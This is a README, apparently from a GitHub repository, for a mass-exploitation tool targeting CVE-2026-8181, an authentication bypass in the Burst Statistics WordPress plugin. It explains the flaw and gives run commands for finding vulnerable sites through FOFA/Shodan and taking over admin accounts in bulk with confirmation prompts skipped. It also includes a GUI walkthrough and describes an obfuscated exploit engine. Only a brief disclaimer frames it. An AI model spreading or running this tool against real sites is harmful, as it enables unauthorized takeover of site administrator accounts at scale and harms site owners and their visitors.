
CVE-2026-8181 — Burst Statistics WordPress plugin Authentication Bypass (CVSS 9.8) to Admin Account Takeover. Mass scanner with FOFA/Shodan integration and modern GUI.
CVSS 9.8 (Critical) — 인증 우회로 관리자 계정 탈취
CVE-2026-8181은 WordPress 플러그인 Burst Statistics 버전 3.4.0~3.4.1.1의 인증 우회(Authentication Bypass) 취약점입니다. 이 플러그인은 Google Analytics의 개인정보 보호 친화적인 대안으로 200,000개 이상의 WordPress 사이트에서 사용됩니다.
이 취약점으로 인해 관리자 사용자 이름을 아는 인증되지 않은 공격자는 다음을 수행할 수 있습니다:
class-mainwp-proxy.php의 is_mainwp_authenticated() 함수는 wp_authenticate_application_password()의 반환 값 검증에 오류가 있습니다. 해당 함수는 REST API 컨텍스트 밖에서 호출되면 null을 반환하며(WP_Error가 아님), 코드는 is_wp_error()만 확인합니다. null은 WP_Error가 아니므로 인증이 성공한 것으로 간주됩니다.
# 1. Clone repository
git clone https://github.com/YOUR_USERNAME/CVE-2026-8181.git
cd CVE-2026-8181
# 2. Install dependencies
py -3.11 -m pip install -r requirements.txt
# 3. Siapkan .env (untuk scan via FOFA / Shodan)
echo [email protected] > .env
echo FOFA_KEY=your_fofa_key >> .env
echo SHODAN_KEY=your_shodan_key >> .env
# 4. Jalankan (pilih salah satu):
# Modern GUI (recommended)
py -3.11 gui_modern.py
# Atau double-click run.bat
run.bat
# Atau CLI langsung exploit satu target
py -3.11 CVE-2026-8181.py -t https://target.com -u admin --no-confirm
# Atau exploit massal dari file
py -3.11 CVE-2026-8181.py -l targets_output.txt -u admin --no-confirm
# Atau scan target dulu, baru exploit
py -3.11 finder.py --file list.txt
py -3.11 CVE-2026-8181.py -l targets_output.txt -u admin --no-confirm
run.bat을 더블클릭하거나 다음을 실행하세요:
py -3.11 gui_modern.py

3개의 탭이 있는 CVE-2026-8181 모던 GUI 화면
Scan 탭에서: 대상 소스 선택(.env의 FOFA/Shodan, 파일 또는 수동) → SCAN TARGETS 클릭 Exploit 탭에서: 관리자 사용자 이름 입력 → EXPLOIT 클릭

도구가 취약한 대상을 찾아 익스플로잇 준비 완료
익스플로잇이 성공하면 공격자는 관리자로서 전체 액세스 권한을 얻습니다:

성공적인 익스플로잇 후 WordPress 관리자 대시보드
CVE-2026-8181/
├── CVE-2026-8181.py # Main exploit engine (PyArmor)
├── gui_modern.py # Modern GUI wrapper (recommended)
├── finder.py # Target scanner (FOFA / Shodan / File)
├── run.bat # One-click launcher
├── requirements.txt # Python dependencies
├── .env # API keys (gitignored)
├── .gitignore
├── Dork.txt # Google Dork
├── pyarmor_runtime_000000/ # PyArmor runtime (Python 3.11)
├── system/ # Source modules (obfuscated)
└── img/ # Screenshots tutorial
├── 1.png
├── 2.png
└── 3.png
.env에 입력.env에 입력교육 목적 및 공인된 침투 테스트 용도로만 사용하십시오. 귀하가 소유하지 않은 시스템에 대한 무단 사용은 불법입니다. 본인이 소유했거나 서면 허가를 받은 사이트에만 사용하십시오.
| Flag | 설명 |
|---|
-t, --target | 대상 URL (단일) |
-l, --list | 대상 목록이 포함된 파일 |
-u, --username | 관리자 사용자 이름 (기본값: admin) |
-T, --threads | 스레드 수 (기본값: 10) |
-o, --output | 결과 출력 파일 |
-v, --verbose | 디버그 출력 |
--timeout | 요청 타임아웃 (초) |
--no-confirm | 확인 건너뛰기 |